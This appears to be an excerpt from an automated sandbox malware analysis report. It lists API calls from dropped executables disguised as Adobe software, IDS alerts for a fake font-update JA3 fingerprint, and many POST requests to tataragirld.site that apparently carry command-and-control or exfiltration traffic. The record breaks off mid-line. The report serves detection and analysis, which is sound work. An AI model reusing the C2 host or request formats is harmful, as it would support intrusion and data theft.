Source: Binary string: AXE8SharedExpat.pdb source: AdobeSync.exe, 00000003.00000002.1394420634.000000006D350000.00000002.00000001.01000000.00000009.sdmp, AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: 4C:\Users\user\AppData\Roaming\com.adobe.dunamis_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: AXE8SharedExpat.pdbppPm source: AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_00863CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00863CC4
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_008A4440 FindFirstFileW,FindClose,0_2_008A4440
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_00897B87 FindFirstFileExW,0_2_00897B87
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_00879B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00879B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_00604440 FindFirstFileW,FindClose,2_2_00604440
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_005D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,2_2_005D9B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_005F7B87 FindFirstFileExW,2_2_005F7B87
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_005C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_005C3CC4
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_6D36DCB0 GetWindowsDirectoryW,lstrcmpW,lstrlenW,lstrlenW,FindFirstFileW,lstrlenW,DeleteFileW,FindNextFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_6D36DCB0
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_6D37DB36 FindFirstFileExW,2_2_6D37DB36
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Code function: 3_2_000BCE10 FindFirstFileW,3_2_000BCE10
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Code function: 3_2_000BBB70 FindFirstFileW,GetFullPathNameW,GetLastError,FindFirstFileW,GetLastError,FindClose,_CxxThrowException,3_2_000BBB70
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: Joe Sandbox View IP Address: 52.168.117.171
Source: Joe Sandbox View IP Address: 18.164.96.90
Source: Joe Sandbox View IP Address: 162.159.61.3
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49967 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49976 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50090 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50091 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50092 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50089 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50088 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50096 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50097 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50093 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50099 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50098 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50094 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50095 -> 188.114.97.3:443
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Content-Length: 147Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 53Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 208Host: tataragirld.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=13987848475950bac8edbe91736252351; XID=13987848475950bac8edbe91736252351
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252351081&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736252351083&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cd8507b94268428491b16cc06b6a4f34&activityId=cd8507b94268428491b16cc06b6a4f34&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50B43BAE0D944675912718075641D4BF&MUID=040C031DFB13691C1F601670FA61685C HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354404&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 11894sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252354414&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 33609sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355017&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5380sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355418&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9881sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 131275Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 745Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Content-Length: 147Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 212Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 380Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 53Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 9953Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 66611Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hwContent-Length: 35Host: tataragirld.site
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 23.216.132.32
Source: unknownTCP traffic detected without corresponding DNS query: 52.168.117.171
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.96.90
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000B4970 HttpSendRequestA,printf,_CxxThrowException,HttpSendRequestA,InternetReadFile,_CxxThrowException,HttpEndRequestA,3_2_000B4970
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, 